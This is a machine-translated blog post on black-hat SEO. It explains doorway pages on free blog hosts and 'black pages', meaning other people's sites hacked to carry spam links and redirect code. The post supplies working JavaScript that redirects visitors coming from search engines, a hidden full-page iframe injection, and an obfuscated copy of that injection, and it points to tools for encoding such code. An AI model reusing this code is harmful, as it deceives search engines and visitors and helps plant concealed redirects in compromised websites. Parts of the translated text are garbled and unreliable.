In the last year, we were also in the third party blog crazy bombing, such as: webs.com, blogspot.com, weebly.com mainly because of its own blog platform weight, and then low cost, the Lord needs to register, no domain name and server input. Ranking is also very good, the way to achieve this page is also a variety of methods, such as: The use of JS settings from the search engine to direct jump, embedded framework, call the main station code.
But today, after several Google algorithm adjustments, these third-party platform weight is weakened, and few such platforms will have a good ranking, in the past some of the upper and middle words, almost fill the top three pages. In the face of this situation, foreign trade seoer How to do? Don't do the door page? How can, thought change a bit, result black page appeared, old domain name appeared, high PR appeared. First of all, the Black page: As the name suggests is the use of hacking technology to black out other people's website, after what do you want to do? Hang friends chain, change title, embed jump code, brush ranking. Do whatever, and such a black page ranking as long as the crazy bombing, search keywords to see what is the home page? "Black page". Say the old domain name: Black page appears to face black eating black situation, generally get black page, ranking pushed up. Master and so on, directly take down the Black page server, the loophole to fill up. I'm sorry, but you pushed it white. All appear to use the old domain name to promote, of course, the cost is relatively higher, usually a domain name in 30-50 yuan, now buy old domain name, with the cost of PR is also in 200+. Method that is also a variety of direct to the main station to promote, there is directly in the old domain name hanging on the blog, post a few articles to promote, there is a single page, release a few paragraphs, the main keywords strong after the main station with JS call, (this is the advantage of the user to see the page is the main station, Just click on any of the link domain name will jump to the corresponding main station, the following hidden content is not visible, such as for the promotion of an article. Many people use this kind of JS code do not want to let others copy their own methods, so will be the JS code encryption.
Let's talk about the key, how is this page implemented?
JS Jump code:
<script type= "Text/javascript" >//<! [cdata[
var regexp=/\. (aol|google|youdao|yahoo|bing|ask|biso|gougou|ifeng|ivc|docomo|jword|biglobe|auone|sooule|niuhu|biso| clusty| dogpile| answers| USA) (\.[ a-z0-9\-]+) {1,2}\//ig; var where =document.referrer;if (Regexp.test (where)) {window.location.href= "http://www.migong.org"}
]]></script>
The above code can be based on specific needs of the search engine to be cut, the unnecessary deletion, leaving only Google, Yahoo, Bing these mainstream search engine can.
Embed Frame code:
<iframe id= "RF" style= "width:100%; height:2650px; Display:block; Visibility:visible, "src=" http://afish.cnblogs.com "frameborder=" 0 "scrolling=" no "></iframe>
The disadvantage of frame embedding is that it also shows the other content of the page, and then stays on the domain name of the page after clicking it. Did not jump to the corresponding domain name. Just within the framework of the implementation of the domain name of the jump, so this piece needs to be added in the main station code to achieve jump.
Encryption Code:
<script type= "Text/javascript" >//<! [cdata[
var code=window["Document" ["getElementById"] ("body");
code["Style" ["Visibility"]= "visible";
code["InnerHTML"]= "<iframe frameborder= ' 0 ' height= ' 2030 ' scrolling= ' no ' src= ' http://afish.cnblogs.com ' width= ' 100% '/> ';
]]></script>
The JS code you see here is not encrypted, so how do we implement encryption? The following 2 tools can be used for encryption, and one thing to note is that this code is placed at the bottom, which is the top of
Encrypted address 1:http://tool.chinaz.com/tools/scriptencode.aspx
Encrypted address 2:http://tool.chinaz.com/tools/urlcrypt.aspx
The first URL is encrypted JS code with, but will find the URL is not encrypted, so in the second encrypted address, encrypt the URL, replace the first encryption when there is no encrypted URL.
Post-encryption effects:
<script type= "Text/javascript" >//<! [cdata[
document.write (unescape (' var%20code%3dwindow%5b%22document%22%5d%5b%22getelementbyid%22%5d%28%22body%22%29%3b %0acode%5b%22style%22%5d%5b%22visibility%22%5d%3d%22visible%22%3b%0acode%5b%22innerhtml%22%5d%3d%22%3ciframe% 20frameborder%3d%270%27%20height%3d%272030%27%20scrolling%3d%27no%27%20src%3d%27http://%61%66%69%73%68%2e%63% 6e%62%6c%6f%67%73%2e%63%6f%6d/%27%20width%3d%27100%25%27%20/%3e%22%3b%0a '));
]]></script>
SEO black page and door page frame and JS Jump implementation method